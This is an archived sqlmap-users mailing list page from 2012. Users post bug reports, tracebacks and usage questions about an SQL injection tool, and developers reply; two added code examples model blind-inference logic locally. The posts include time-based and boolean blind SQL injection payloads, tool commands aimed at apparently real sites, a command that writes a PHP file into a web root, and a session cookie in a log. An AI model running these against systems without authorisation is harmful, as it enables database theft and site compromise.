sqlmap-users Mailing List for sqlmap (Page 68)
From: David A. <dav...@gm...> - 2012-01-30 11:23:07

Hi Miroslav,

Thank you for your response! "INFERENCE_BLANK_BREAK" was very useful to reduce the number of requests. great!

Now, I report you an unhandled exception found during the test:

[CRITICAL] unhandled exception in sqlmap/1.0-dev (r4692), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.

    sqlmap version: 1.0-dev (r4692)
    Python version: 2.6.6
    Operating system: posix
    Command line: sqlmap.py -u ************************************************************************************************************************************************************************* --data ******************************************************* -p param --cookie=****** --proxy http://127.0.0.1:1234 --safe-freq=1 --safe-url=*************************************** --tables
    Technique: BOOLEAN
    Back-end DBMS: IBM DB2 (fingerprinted)
    Traceback (most recent call last):
      File "/home/user/sqlmap-dev/_sqlmap.py", line 83, in main
        start()
      File "/home/user/sqlmap-dev/lib/controller/controller.py", line 563, in start
        action()
      File "/home/user/sqlmap-dev/lib/controller/action.py", line 91, in action
        conf.dumper.dbTables(conf.dbmsHandler.getTables())
      File "/home/user/sqlmap-dev/plugins/generic/enumeration.py", line 833, in getTables
        dbs = self.getDbs()
      File "/home/user/sqlmap-dev/plugins/generic/enumeration.py", line 777, in getDbs
        db = inject.getValue(query, inband=False, error=False)
      File "/home/user/sqlmap-dev/lib/request/inject.py", line 457, in getValue
        value = __goInferenceProxy(query, fromUser, expected, batch, resumeValue, unpack, charsetType, firstChar, lastChar, dump)
      File "/home/user/sqlmap-dev/lib/request/inject.py", line 324, in __goInferenceProxy
        outputs = __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected, resumeValue=resumeValue, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump)
      File "/home/user/sqlmap-dev/lib/request/inject.py", line 103, in __goInferenceFields
        output = __goInference(payload, expressionReplaced, charsetType, firstChar, lastChar, dump)
      File "/home/user/sqlmap-dev/lib/request/inject.py", line 66, in __goInference
        count, value = bisection(payload, expression, length, charsetType, firstChar, lastChar, dump)
      File "/home/user/sqlmap-dev/lib/techniques/blind/inference.py", line 497, in bisection
        val = getChar(index, asciiTbl)
      File "/home/user/sqlmap-dev/lib/techniques/blind/inference.py", line 214, in getChar
        unescapedCharValue = unescaper.unescape(markingValue % decodeIntToUnicode(posValue))
    TypeError: %c requires int or char

Kind Regards,
David Alvarez

From: Miroslav S. <mir...@gm...> - 2012-01-30 10:07:14

Hi David.

Fact is that we rely that DBMS won't return a proper character on a request for "substring" on non-valid index and that works ok for most of today's DBMSes.

But, also we do have a check for these kinds of cases. If there is more than some predefined number of spaces at the end of the retrieved value we just abruptly abort with that value, trim spaces from the end and continue on with the next item.

Thing is that that "breaking" value is currently (r4692) set to 10 and if you think that's too high for your case you are more than welcome to adjust it to your needs. Just go to the lib/core/settings.py and change line:

    INFERENCE_BLANK_BREAK = 10

to something more appropriate for your needs (e.g. 3)

Kind regards,
Miroslav Stampar

--
Miroslav Stampar
http://about.me/stamparm

From: Miroslav S. <mir...@gm...> - 2012-01-30 09:03:49

Hi Abuse.

Thank you for your report and find it fixed with the latest commit (r4691).

Kind regards,
Miroslav Stampar

--
Miroslav Stampar
http://about.me/stamparm

From: Miroslav S. <mir...@gm...> - 2012-01-29 10:16:10

Hi.

Will check it later today and fix it (as it seems like it needs to be fixed).

Kind regards

From: Bernardo D. A. G. <ber...@gm...> - 2012-01-28 09:44:13

Svn update. It has been fixed about a week ago.

Bernardo Damele A. G.

This message was sent from a smartphone

From: Iago S. <146...@gm...> - 2012-01-27 23:55:19

How to type the query if the password contains @ in the value?

From: David A. <dav...@gm...> - 2012-01-27 17:53:31

Hello,

There is a sql injection in an IBM DB2 9.1. I'm using an AND boolean-based blind injection. The problem is that sqlmap doesn't check properly the end of the string and go in loop getting space chars as result.

I'm using the latest version of sqlmap (r4690).

How could I resolve it?

Regards,
David Alvarez

From: Miroslav S. <mir...@gm...> - 2012-01-27 14:58:04

Hi Brian.

Minor update. As Sybase doesn't support LIMIT/OFFSET like structure (same thing as for MSSQL) we use a method called "pivoting" (one column is used as a "pivot" for retrieving other column values) for deriving row content from tables. Now, problem is that pivoting requires "derived" tables. Sorry, but this moment it has to stay as it is for proper dumping of Sybase tables in general.

Kind regards,
Miroslav Stampar

--
Miroslav Stampar
http://about.me/stamparm

From: Miroslav S. <mir...@gm...> - 2012-01-27 14:44:54

Hi Brian.

Sorry for the late reply.

You can try it yourself and report back. You can go to the xml/queries.xml, line 533 and change:

    ...count2="SELECT COUNT(*) FROM (SELECT DISTINCT %s FROM %s) AS value_table"/>

to:

    ...count2="SELECT COUNT(DISTINCT %s) FROM %s"/>

Please, also try with multiple column names (e.g. --dump for a table with multiple column names)

Kind regards,
Miroslav Stampar

--
Miroslav Stampar
http://about.me/stamparm

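The two count2 shapes quoted in the message above are not interchangeable in every case. The following is an added example, not code from sqlmap or from either poster: it runs both templates against an in-memory SQLite database used as a stand-in (Sybase itself is not involved, and the table t with its rows is constructed), and shows that they diverge when the column contains NULL and that this stand-in rejects the flat form for multiple column names.

```python
import sqlite3

# Constructed sample rows: one duplicate row and one NULL name.
ROWS = [
    ("master", 1), ("tempdb", 2), ("master", 1),
    (None, 3), ("model", 2), ("model", 4),
]

# The two templates from the message, %s placeholders kept as quoted there.
DERIVED = "SELECT COUNT(*) FROM (SELECT DISTINCT %s FROM %s) AS value_table"
FLAT = "SELECT COUNT(DISTINCT %s) FROM %s"


def make_db(rows=ROWS):
    """Build the constructed stand-in table (hypothetical name: t)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE t (name TEXT, owner INTEGER)")
    conn.executemany("INSERT INTO t VALUES (?, ?)", rows)
    return conn


def count(conn, template, columns, table="t"):
    """Run one template; return the count, or None if the DBMS rejects it."""
    try:
        return conn.execute(template % (columns, table)).fetchone()[0]
    except sqlite3.OperationalError:
        return None


def compare(conn, columns):
    """Return (derived-table count, flat COUNT(DISTINCT) count)."""
    return count(conn, DERIVED, columns), count(conn, FLAT, columns)


if __name__ == "__main__":
    db = make_db()
    for cols in ("owner", "name", "name, owner"):
        print("%-12s derived=%s flat=%s" % ((cols,) + compare(db, cols)))
```

The derived form counts NULL as one distinct row while COUNT(DISTINCT col) skips NULLs, so the row count used to drive enumeration can come out one short after the rewrite. Whether a given back end accepts COUNT(DISTINCT a, b) has to be checked per DBMS.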
From: Miroslav S. <mir...@gm...> - 2012-01-27 10:21:11

Hi Iago.

This is a clearly "only Python 3" version of pymsql you are using.

If you go to: https://github.com/petehunt/PyMySQL/blob/master/pymysql/connections.py you'll see that there "import ConfigParser" is used which is compatible with required Python v2.

This whole mess is a result of "The ConfigParser module has been renamed to configparser in Python 3.0" (http://docs.python.org/library/configparser.html).

Please, go to the: https://github.com/petehunt/PyMySQL/downloads and download there the version for Python 2.x.

Kind regards,
Miroslav Stampar

--
Miroslav Stampar
http://about.me/stamparm

From: Iago S. <146...@gm...> - 2012-01-27 02:46:03

    sqlmap version: 1.0-dev (r4690)
    Python version: 2.6.5
    Operating system: posix
    Command line: sqlmap.py -d **************************************************************
    Technique: None
    Back-end DBMS: MySQL (identified)
    Traceback (most recent call last):
      File "/pentest/database/sqlmap/_sqlmap.py", line 83, in main
        start()
      File "/pentest/database/sqlmap/lib/controller/controller.py", line 227, in start
        action()
      File "/pentest/database/sqlmap/lib/controller/action.py", line 32, in action
        setHandler()
      File "/pentest/database/sqlmap/lib/controller/handler.py", line 98, in setHandler
        conf.dbmsConnector.connect()
      File "/pentest/database/sqlmap/plugins/dbms/mysql/connector.py", line 39, in connect
        self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True)
      File "/usr/local/lib/python2.6/dist-packages/PyMySQL3-0.4-py2.6.egg/pymysql/__init__.py", line 92, in Connect
        from .connections import Connection
      File "/usr/local/lib/python2.6/dist-packages/PyMySQL3-0.4-py2.6.egg/pymysql/connections.py", line 21, in <module>
        import configparser
    ImportError: No module named configparser

    [*] shutting down at 23:37:41

From: Abuse 0. <abu...@gm...> - 2012-01-26 22:35:48

Hello,

When using sqlmap with the forms option, it does not send the cookies or headers specified on the command line. I'd like sqlmap to connect to the specified URL using the cookie(s) I specify and then process the forms on the response. Is there some way to do this, or does it require grabbing the response manually, or code changes to sqlmap?

Here is my sqlmap version:

    URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap
    Repository Root: https://svn.sqlmap.org/sqlmap
    Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb
    Revision: 4687
    Node Kind: directory
    Schedule: normal
    Last Changed Author: stamparm
    Last Changed Rev: 4687
    Last Changed Date: 2012-01-16 21:28:21 +1100 (Mon, 16 Jan 2012)

Here is the request with --forms:

    # sqlmap.py -u "http://<removed>/<removed>.php" --cookie="PHPSESSID=<removed>; username=<removed>" -v 6 --forms

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    <snip>
    [09:30:50] [DEBUG] cleaning up configuration parameters
    [09:30:50] [DEBUG] setting the HTTP timeout
    [09:30:50] [DEBUG] setting the HTTP Cookie header
    [09:30:50] [DEBUG] setting the HTTP method to GET
    [09:30:50] [DEBUG] setting the HTTP proxy to pass by all HTTP requests
    [09:30:50] [DEBUG] creating HTTP requests opener object
    [09:30:50] [INFO] testing connection to the target url
    [09:30:50] [TRAFFIC OUT] HTTP request [#1]:
    GET /vote.php HTTP/1.1
    Accept-Encoding: identity
    Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
    Host: s14513-20grcmuy.roma.coliseumlab.net
    Accept-language: en-us,en;q=0.5
    Pragma: no-cache
    Cache-control: no-cache,no-store
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Connection: close

Here is the request without --forms:

    # sqlmap.py -u "http://<removed>/<removed>.php" --cookie="PHPSESSID=<removed>; username=<removed>" -v 6

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    <snip>
    [09:31:20] [DEBUG] cleaning up configuration parameters
    [09:31:20] [DEBUG] setting the HTTP timeout
    [09:31:20] [DEBUG] setting the HTTP Cookie header
    [09:31:20] [DEBUG] setting the HTTP method to GET
    [09:31:20] [DEBUG] setting the HTTP proxy to pass by all HTTP requests
    [09:31:20] [DEBUG] creating HTTP requests opener object
    [09:31:20] [ERROR] [*] EH: start()
    [09:31:20] [ERROR] [*] EH: conf.url and not any conf.forms...
    [09:31:20] [INFO] using '/root/checkout/sqlmap-gitsvn/output/s14513-20grcmuy.roma.coliseumlab.net/session' as session file
    [09:31:20] [INFO] testing connection to the target url
    [09:31:20] [TRAFFIC OUT] HTTP request [#1]:
    GET /vote.php HTTP/1.1
    Accept-Encoding: identity
    Accept-language: en-us,en;q=0.5
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    User-agent: sqlmap/1.0-dev (http://www.sqlmap.org)
    Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
    Host: s14513-20grcmuy.roma.coliseumlab.net
    Cookie: PHPSESSID=l82mfmirthmukct3kp7sj3gji2; username=MzAx
    Pragma: no-cache
    Cache-control: no-cache,no-store
    Connection: close

Thanks,
Abu

From: Brian P. <po...@gm...> - 2012-01-25 00:57:02

Hello,

Recently I've run into an issue with sqlmap and a pre-12.5.1 Sybase DB. It seems pre-12.5.1 Sybase DBs do not support derived tables (e.g., SELECT * FROM (SELECT example from table) as name). sqlmap uses these when enumerating the table so it quickly runs into syntax errors. The feature announcement for derived tables in 12.5.1 is below:

http://manuals.sybase.com/onlinebooks/group-as/asg1251e/whatsnew/@ebt-link;pt=584?target=%25N%14_1010_START_RESTART_N%25

I took a quick look and some of the basic queries can be rewritten, e.g.:

    AND ASCII(SUBSTRING((SELECT ISNULL(CONVERT(NVARCHAR(4000),COUNT(*)),CHAR(32)) FROM (SELECT DISTINCT mmlP.name FROM (SELECT name FROM master..sysdatabases) AS mmlP) AS value_table),3,1)) > 1

to

    AND ASCII(SUBSTRING((SELECT ISNULL(CONVERT(NVARCHAR(4000),(SELECT COUNT(DISTINCT name) FROM master..sysdatabases)),CHAR(32)) ),3,1)) > 1

However I'm unclear if this would work in all cases (and if so, how it could be done cleanly.) Thoughts?

Brian

From: Miroslav S. <mir...@gm...> - 2012-01-24 08:48:18

Hi Ryan.

Only differences between what sqlmap uses and this are:

A) they call it bit banging, we call bit inferencing through bisection
B) they use boolean AND we use arithmetic greater than

Both algorithms have Log2n complexity, so there is no breakthrough here

Kind regards,
Miroslav Stampar

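The request-count claim in the message above, together with the trailing-blank check described in the 2012-01-30 message about INFERENCE_BLANK_BREAK, can be checked with a small model. This is an added example, not sqlmap's code and not the script linked in the thread: the Oracle class, the helper names and the sample values are constructed, and the "back end" is a local object with no SQL or network traffic.

```python
PAD = " "


class Oracle:
    """Local stand-in answering yes/no questions about one character.

    pads_past_end=True models a back end that returns a blank for an
    index past the end of the value (the DB2 case reported on the list);
    False models one that returns nothing (code 0). Constructed model.
    """

    def __init__(self, value, pads_past_end):
        self.value = value
        self.pads_past_end = pads_past_end
        self.requests = 0

    def _code(self, index):
        # index is 1-based, as in SQL SUBSTRING
        if index <= len(self.value):
            return ord(self.value[index - 1])
        return ord(PAD) if self.pads_past_end else 0

    def greater_than(self, index, threshold):
        self.requests += 1
        return self._code(index) > threshold

    def bit_set(self, index, mask):
        self.requests += 1
        return bool(self._code(index) & mask)


def char_by_bisection(oracle, index, lo=0, hi=127):
    """Arithmetic 'greater than' bisection over a 7-bit range."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle.greater_than(index, mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def char_by_bits(oracle, index, bits=7):
    """Boolean AND test of each bit in turn."""
    code = 0
    for bit in range(bits):
        if oracle.bit_set(index, 1 << bit):
            code |= 1 << bit
    return code


def extract(oracle, get_char, blank_break, max_len=64):
    """Read characters until code 0, max_len, or blank_break trailing blanks."""
    out = ""
    for index in range(1, max_len + 1):
        code = get_char(oracle, index)
        if code == 0:
            break
        out += chr(code)
        if blank_break and out.endswith(PAD * blank_break):
            break
    return out.rstrip(PAD), oracle.requests


def run(value, pads_past_end, get_char, blank_break):
    return extract(Oracle(value, pads_past_end), get_char, blank_break)


if __name__ == "__main__":
    for getter in (char_by_bisection, char_by_bits):
        print(getter.__name__, run("DB2ADMIN", False, getter, 10))
    for limit in (0, 10, 3):
        print("blank_break=%d" % limit, run("DB2ADMIN", True, char_by_bisection, limit))
    print("inner blanks", run("A    B", True, char_by_bisection, 3))
```

Both strategies cost seven requests per 7-bit character, so the total is driven by how many positions are read: on the padding back end a limit of 10 reads ten extra positions and a limit of 3 reads three, while a limit that is too low cuts a value containing a run of legitimate blanks.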
From: Ryan S. <rd...@mt...> - 2012-01-23 19:58:03
|
Hi all,

Long time no talk, I just came across this:
http://console-cowboys.blogspot.com/2012/01/bit-banging-your-database.html

Which looks quite promising, basically it uses the binary representation and some boolean calculations to determine the length of fields and other information as opposed to doing it character by character. It basically narrows everything down to about 8 requests to find the length of the data.

I'm not sure if SQLMap uses a technique similar, but it may be worth looking into, as it could drastically lower the time it takes to mine out info from time-based blind injection!

The sample code can be found here:
http://consolecowboys.org/scripts/vm_own.py

Thanks!
Ryan |
From: Bernardo D. A. G. <ber...@gm...> - 2012-01-23 11:10:35
|
At the moment, there is no way to inject into JSON data unfortunately. The asterisk character is not yet supported in POST data. We will soon implement this.

Bernardo

On 23 January 2012 10:39, Borja Berastegui <bor...@gm...> wrote:
> Hi !
>
> I've just found an injection via a JSON parameter which I've tested manually
> and I'm trying to succeed with sqlmap.
>
> But I can't find the way to tell sqlmap where to inject.
>
> Via the --data parameter there is no way to tell where to inject like in the
> URI injections with get and the * ?
>
> I've tried also by the --prefix and --suffix to complete the post data to
> send, but these parameters got messed up with all the JSON quotes. Sqlmap
> returns the error ''You havent especified the sufix''.
>
> Thanks for all ;)

--
Bernardo Damele A. G.
Homepage: http://about.me/inquis
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949) |
From: Borja B. <bor...@gm...> - 2012-01-23 10:39:45
|
Hi !

I've just found an injection via a JSON parameter which I've tested manually and I'm trying to succeed with sqlmap.

But I can't find the way to tell sqlmap where to inject.

Via the --data parameter there is no way to tell where to inject like in the URI injections with get and the * ?

I've tried also by the --prefix and --suffix to complete the post data to send, but these parameters got messed up with all the JSON quotes. Sqlmap returns the error ''You havent especified the sufix''.

Thanks for all ;) |
From: Miroslav S. <mir...@gm...> - 2012-01-23 09:30:27
|
Hi Pedrito.

Thank you for your report and find it "patched" with the latest commit.

Kind regards,
Miroslav Stampar

On Mon, Jan 23, 2012 at 8:00 AM, Pedrito Perez <0ar...@gm...> wrote:
> [WARNING] unknown charset 'utf8_general_ci'. Please report by e-mail to
> sql...@li....
> sqlmap.py --random-agent -o -u
> http://lamusicoteca.com/paginas/galeria.php?id=7 --dbs

--
Miroslav Stampar
http://about.me/stamparm |
From: Pedrito P. <0ar...@gm...> - 2012-01-23 07:00:32
|
[WARNING] unknown charset 'utf8_general_ci'. Please report by e-mail to sql...@li....

sqlmap.py --random-agent -o -u http://lamusicoteca.com/paginas/galeria.php?id=7 --dbs |
From: Bernardo D. A. G. <ber...@gm...> - 2012-01-22 18:34:46
|
Hi Chris,

Against login forms I generally recommend increasing --risk to 3. In your case the -t traffic.log and -v3 might be of use to debug too.

Bernardo

On 22 January 2012 18:18, Chris Oakley <chr...@gm...> wrote:
> In fact, don't worry about suggestions for manual syntax, te...@te...'if 1
> = 1 waitfor delay'0:0:20'-- works so I can work with that. But I wonder why
> sqlmap is struggling? Chris
>
>
> On 22 January 2012 18:12, Chris Oakley <chr...@gm...> wrote:
>>
>> Hi
>>
>> I've got a web app where the username field of the login form is affected
>> by the following string: te...@te...'waitfor delay'0:0:10'-- as a
>> username; i.e. the delay happens, the app is vulnerable. It will always
>> then return you to the login screen with an invalid email error, but we
>> should still be able to exploit the app using time based methods. Sqlmap
>> picks up on this, but then fails at the fingerprinting stage, i.e:
>>
>> [18:04:03] [INFO] testing MySQL
>> [18:04:03] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
>> [18:04:16] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for --time-sec option as possible (e.g. 10 or more)
>> [18:04:16] [WARNING] the back-end DBMS is not MySQL
>> [18:04:16] [INFO] testing Oracle
>> [18:04:17] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
>> [18:04:17] [WARNING] the back-end DBMS is not Oracle
>> [18:04:17] [INFO] testing PostgreSQL
>> [18:04:17] [WARNING] the back-end DBMS is not PostgreSQL
>> [18:04:17] [INFO] testing Microsoft SQL Server
>> [18:04:18] [WARNING] the back-end DBMS is not Microsoft SQL Server
>> [18:04:18] [INFO] testing SQLite
>> [18:04:18] [WARNING] the back-end DBMS is not SQLite
>> [18:04:18] [INFO] testing Microsoft Access
>> [18:04:18] [WARNING] the back-end DBMS is not Microsoft Access
>> [18:04:18] [INFO] testing Firebird
>> [18:04:19] [WARNING] the back-end DBMS is not Firebird
>> [18:04:19] [INFO] testing SAP MaxDB
>> [18:04:19] [WARNING] the back-end DBMS is not SAP MaxDB
>> [18:04:19] [INFO] testing Sybase
>> [18:04:19] [WARNING] the back-end DBMS is not Sybase
>> [18:04:19] [INFO] testing IBM DB2
>> [18:04:19] [WARNING] the back-end DBMS is not IBM DB2
>> [18:04:19] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system. Support for this DBMS will be implemented at some point
>>
>> I'm not sure why this would be the case, it should be able to find that
>> it's MS SQL Server.
>>
>> Any ideas why this might be the case? I can provide more verbose
>> information if required, let me know.
>>
>> In the meantime, any ideas for some more manual injections taking into
>> account the syntax of the injection above? I'm going to have a manual play
>> now but I thought you might want to know wrt sqlmap.
>>
>> Cheers
>>
>> Chris

--
Bernardo Damele A. G.
Homepage: http://about.me/inquis
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949) |
From: Chris O. <chr...@gm...> - 2012-01-22 18:18:57
|
In fact, don't worry about suggestions for manual syntax, te...@te...'if 1 = 1 waitfor delay'0:0:20'-- works so I can work with that. But I wonder why sqlmap is struggling?

Chris

On 22 January 2012 18:12, Chris Oakley <chr...@gm...> wrote:
> Hi
>
> I've got a web app where the username field of the login form is affected
> by the following string: te...@te...'waitfor delay'0:0:10'-- as a
> username; i.e. the delay happens, the app is vulnerable. It will always
> then return you to the login screen with an invalid email error, but we
> should still be able to exploit the app using time based methods. Sqlmap
> picks up on this, but then fails at the fingerprinting stage, i.e:
>
> [18:04:03] [INFO] testing MySQL
> [18:04:03] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
> [18:04:16] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for --time-sec option as possible (e.g. 10 or more)
> [18:04:16] [WARNING] the back-end DBMS is not MySQL
> [18:04:16] [INFO] testing Oracle
> [18:04:17] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
> [18:04:17] [WARNING] the back-end DBMS is not Oracle
> [18:04:17] [INFO] testing PostgreSQL
> [18:04:17] [WARNING] the back-end DBMS is not PostgreSQL
> [18:04:17] [INFO] testing Microsoft SQL Server
> [18:04:18] [WARNING] the back-end DBMS is not Microsoft SQL Server
> [18:04:18] [INFO] testing SQLite
> [18:04:18] [WARNING] the back-end DBMS is not SQLite
> [18:04:18] [INFO] testing Microsoft Access
> [18:04:18] [WARNING] the back-end DBMS is not Microsoft Access
> [18:04:18] [INFO] testing Firebird
> [18:04:19] [WARNING] the back-end DBMS is not Firebird
> [18:04:19] [INFO] testing SAP MaxDB
> [18:04:19] [WARNING] the back-end DBMS is not SAP MaxDB
> [18:04:19] [INFO] testing Sybase
> [18:04:19] [WARNING] the back-end DBMS is not Sybase
> [18:04:19] [INFO] testing IBM DB2
> [18:04:19] [WARNING] the back-end DBMS is not IBM DB2
> [18:04:19] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system. Support for this DBMS will be implemented at some point
>
> I'm not sure why this would be the case, it should be able to find that
> it's MS SQL Server.
>
> Any ideas why this might be the case? I can provide more verbose
> information if required, let me know.
>
> In the meantime, any ideas for some more manual injections taking into
> account the syntax of the injection above? I'm going to have a manual play
> now but I thought you might want to know wrt sqlmap.
>
> Cheers
>
> Chris
|
From: Chris O. <chr...@gm...> - 2012-01-22 18:12:20
|
Hi

I've got a web app where the username field of the login form is affected by the following string: te...@te...'waitfor delay'0:0:10'-- as a username; i.e. the delay happens, the app is vulnerable. It will always then return you to the login screen with an invalid email error, but we should still be able to exploit the app using time based methods. Sqlmap picks up on this, but then fails at the fingerprinting stage, i.e:

[18:04:03] [INFO] testing MySQL
[18:04:03] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[18:04:16] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for --time-sec option as possible (e.g. 10 or more)
[18:04:16] [WARNING] the back-end DBMS is not MySQL
[18:04:16] [INFO] testing Oracle
[18:04:17] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[18:04:17] [WARNING] the back-end DBMS is not Oracle
[18:04:17] [INFO] testing PostgreSQL
[18:04:17] [WARNING] the back-end DBMS is not PostgreSQL
[18:04:17] [INFO] testing Microsoft SQL Server
[18:04:18] [WARNING] the back-end DBMS is not Microsoft SQL Server
[18:04:18] [INFO] testing SQLite
[18:04:18] [WARNING] the back-end DBMS is not SQLite
[18:04:18] [INFO] testing Microsoft Access
[18:04:18] [WARNING] the back-end DBMS is not Microsoft Access
[18:04:18] [INFO] testing Firebird
[18:04:19] [WARNING] the back-end DBMS is not Firebird
[18:04:19] [INFO] testing SAP MaxDB
[18:04:19] [WARNING] the back-end DBMS is not SAP MaxDB
[18:04:19] [INFO] testing Sybase
[18:04:19] [WARNING] the back-end DBMS is not Sybase
[18:04:19] [INFO] testing IBM DB2
[18:04:19] [WARNING] the back-end DBMS is not IBM DB2
[18:04:19] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system. Support for this DBMS will be implemented at some point

I'm not sure why this would be the case, it should be able to find that it's MS SQL Server.

Any ideas why this might be the case? I can provide more verbose information if required, let me know.

In the meantime, any ideas for some more manual injections taking into account the syntax of the injection above? I'm going to have a manual play now but I thought you might want to know wrt sqlmap.

Cheers

Chris |
From: Miroslav S. <mir...@gm...> - 2012-01-20 11:19:44
|
Hi Daren.

You wanted to ask what's this all about? It's just what the message says. Windows console is pretty limited in the area of displaying Unicode characters (because it has its own character page scheme), so, we had to warn the user about this issue.

Kind regards,
Miroslav Stampar

On Fri, Jan 20, 2012 at 12:12 PM, Daren Jeronimo <dar...@gm...> wrote:
> [11:53:27] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.

--
Miroslav Stampar
http://about.me/stamparm |
From: Daren J. <dar...@gm...> - 2012-01-20 11:12:28
|
[11:53:27] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files. |
From: Miroslav S. <mir...@gm...> - 2012-01-20 11:00:48
|
Hi Artjom.

Thank you for your report and find it fixed with the latest revision (r4689).

Kind regards,
Miroslav Stampar

On Fri, Jan 20, 2012 at 11:52 AM, Artjom <shi...@gm...> wrote:
> Hello Miroslav,
>
> There is one more small problem in the latest revision (4688). Sqlmap
> crashes if the value of "code" in Detection section of config file is
> uncommented and not set (example config attached). This config (apart
> from edited bulkfile value) was generated by sqlmap itself.
>
> Regards,
>
> Artjom
>
> On Thu, Jan 19, 2012 at 11:57 PM, Miroslav Stampar <mir...@gm...> wrote:
>
>> Hi Nightman.
>>
>> Thank you for your report. It should be fixed with the latest commit.
>>
>> Kind regards,
>> Miroslav Stampar
>>
>>
>> On Mon, Jan 16, 2012 at 12:18 AM, <nig...@em...> wrote:
>>
>>> Hi
>>> I found a new bug
>>>
>>> C:\map>sqlmap -d mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME --file-write=C:\\temp\\test.php --file-dest=/var/www/*********/httpdocs/test.php
>>>
>>> [23:23:36] [INFO] confirming MySQL
>>> [23:23:38] [INFO] the back-end DBMS is MySQL
>>> back-end DBMS: MySQL >= 5.0.0
>>> [23:23:38] [INFO] fingerprinting the back-end DBMS operating system
>>> [23:23:39] [INFO] the back-end DBMS operating system is Linux
>>> [23:54:54] [WARNING] Lost connection to MySQL server during query
>>> [23:54:54] [WARNING] Lost connection to MySQL server during query
>>> [23:54:54] [WARNING] Lost connection to MySQL server during query
>>> [23:54:54] [WARNING] Lost connection to MySQL server during query
>>> [23:54:54] [WARNING] Lost connection to MySQL server during query
>>> [23:54:54] [WARNING] Lost connection to MySQL server during query
>>> [23:54:54] [WARNING] Lost connection to MySQL server during query
>>> [23:54:54] [WARNING] Lost connection to MySQL server during query
>>> [23:54:54] [WARNING] Lost connection to MySQL server during query
>>> [23:54:54] [WARNING] Lost connection to MySQL server during query
>>> [23:54:54] [WARNING] Lost connection to MySQL server during query
>>> [23:54:54] [WARNING] Lost connection to MySQL server during query
>>> [23:54:54] [WARNING] Lost connection to MySQL server during query
>>> do you want confirmation that the file '/var/www/**********/httpdocs/test.php' has been successfully written on the back-end DBMS file system? [Y/n] n
>>>
>>> [23:55:09] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4685), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
>>> sqlmap version: 1.0-dev (r4685)
>>> Python version: 2.7.2
>>> Operating system: nt
>>> Command line: C:\map\sqlmap.py -d **************************************************** --file-write=C:\\temp\\test.php --file-dest=/var/www/**********/httpdocs/test.php
>>> Technique: STACKED
>>> Back-end DBMS: MySQL (fingerprinted)
>>> Traceback (most recent call last):
>>>   File "C:\map\_sqlmap.py", line 83, in main
>>>     start()
>>>   File "C:\map\lib\controller\controller.py", line 227, in start
>>>     action()
>>>   File "C:\map\lib\controller\action.py", line 165, in action
>>>     conf.dbmsConnector.close()
>>>   File "C:\map\plugins\generic\connector.py", line 54, in close
>>>     self.connector.close()
>>>   File "C:\Users\*******\AppData\Roaming\Python\Python27\site-packages\pymysql\connections.py", line 541, in close
>>>     self.wfile.write(send_data)
>>>   File "C:\Python27\lib\socket.py", line 324, in write
>>>     self.flush()
>>>   File "C:\Python27\lib\socket.py", line 303, in flush
>>>     self._sock.sendall(view[write_offset:write_offset+buffer_size])
>>> error: [Errno 10053] An established connection was aborted by the software in your host machine
>>>
>>> [*] shutting down at 23:55:09
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm

--
Miroslav Stampar
http://about.me/stamparm |